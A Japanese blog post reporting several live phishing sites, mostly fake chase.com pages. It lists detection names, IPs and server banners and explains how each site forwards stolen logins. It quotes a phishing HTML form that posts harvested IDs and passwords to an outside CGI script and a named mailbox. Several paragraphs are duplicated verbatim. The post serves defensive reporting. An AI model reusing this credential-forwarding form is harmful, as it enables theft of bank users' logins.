フィッシング詐欺サイト情報
Yesterday: 
ClamAVでHTML.Phishing.Auction-100と検知されています。
アドレス217.129.250.199はポルトガルで逆引きはto-217-129-250-199.netvisao.ptです。トップページには一応コンテンツがあるのでクラックされているようです。ディレクトリ名がドットから始まるのもクラックされたときの特徴です。
フォームで入手したIDとパスワードは以下のようによそにあるできの悪いCGIを利用してharykawa@yahoo.itに送られるようになっています。
<FORM NAME="ContactForm" ACTION="http://webtools.infi.net/cgi-bin/webforms.pl" METHOD="POST">
<INPUT TYPE=hidden NAME=mailto VALUE="harykawa@yahoo.it">
サーバーの応答はApache-AdvancedExtranetServer/2.0.50 (Mandrakelinux/7.6.101mdk) mod_ssl/2.0.50 OpenSSL/0.9.7d PHP/4.3.8です。
アドレス217.129.250.199はポルトガルで逆引きはto-217-129-250-199.netvisao.ptです。トップページには一応コンテンツがあるのでクラックされているようです。ディレクトリ名がドットから始まるのもクラックされたときの特徴です。
フォームで入手したIDとパスワードは以下のようによそにあるできの悪いCGIを利用してharykawa@yahoo.itに送られるようになっています。
<FORM NAME="ContactForm" ACTION="http://webtools.infi.net/cgi-bin/webforms.pl" METHOD="POST">
<INPUT TYPE=hidden NAME=mailto VALUE="harykawa@yahoo.it">
サーバーの応答はApache-AdvancedExtranetServer/2.0.50 (Mandrakelinux/7.6.101mdk) mod_ssl/2.0.50 OpenSSL/0.9.7d PHP/4.3.8です。
● chase.comの偽サイト ttp://www.rolisatz.ch/catalog/image.html
ClamAVでHTML.Phishing.Bank-409と検知されています。
www.rolisatz.chのアドレスは217.26.52.34、逆引きはserver24.hostpoint.chです。
ttp://www.hostpoint.ch/ とするとHOSTPOINTというまじめなサイトが見られるのでレンタルサーバーがクラックされていると判断できます。
タイトルのURLには詐取した情報は別の ttp://www.photographmugs.com/admin/update.php にあるフォームを使って送られるようになっています。ttp://www.photographmugs.com/ を見ると「クラックしたよ」というメッセージが残されているので同じ犯人がこのフォームを用意したものでしょう。通常出来の悪いフォームをメールを無断で使って送る場合mail.phpとかmailform.phpとかいう名前なのですがupdate.phpという名前はこのために設置したフォームであると考えていいからです。
サーバーの応答はApache/1.3.33 (Unix) mod_auth_passthrough/1.8 FrontPage/5.0.2.2510 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.22 OpenSSL/0.9.7d です。
www.rolisatz.chのアドレスは217.26.52.34、逆引きはserver24.hostpoint.chです。
ttp://www.hostpoint.ch/ とするとHOSTPOINTというまじめなサイトが見られるのでレンタルサーバーがクラックされていると判断できます。
タイトルのURLには詐取した情報は別の ttp://www.photographmugs.com/admin/update.php にあるフォームを使って送られるようになっています。ttp://www.photographmugs.com/ を見ると「クラックしたよ」というメッセージが残されているので同じ犯人がこのフォームを用意したものでしょう。通常出来の悪いフォームをメールを無断で使って送る場合mail.phpとかmailform.phpとかいう名前なのですがupdate.phpという名前はこのために設置したフォームであると考えていいからです。
サーバーの応答はApache/1.3.33 (Unix) mod_auth_passthrough/1.8 FrontPage/5.0.2.2510 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.22 OpenSSL/0.9.7d です。
● chase.comの偽サイト ttp://211.154.21.122/usage/.www.chase.com/index.htm
ClamAVでHTML.Phishing.Bank-376と検知されています。
アドレス211.154.21.122は中国で逆引きはありません。
SMTPは拒絶されます。ttp://211.154.21.122/としてトップページを見るとRedHat/Apacheインストール直後のデフォルト画面が表示されるのでクラックされたのかどうか不明です。popの応答だとv2001.78rhというでたらめのサーバー名なので犯人自身が立ち上げているのではないでしょうか。
サーバーの応答はApache/2.0.40 (Red Hat Linux)です。
アドレス211.154.21.122は中国で逆引きはありません。
SMTPは拒絶されます。ttp://211.154.21.122/としてトップページを見るとRedHat/Apacheインストール直後のデフォルト画面が表示されるのでクラックされたのかどうか不明です。popの応答だとv2001.78rhというでたらめのサーバー名なので犯人自身が立ち上げているのではないでしょうか。
サーバーの応答はApache/2.0.40 (Red Hat Linux)です。
— posted by staff @ 07:34AM
| TrackBack(0)
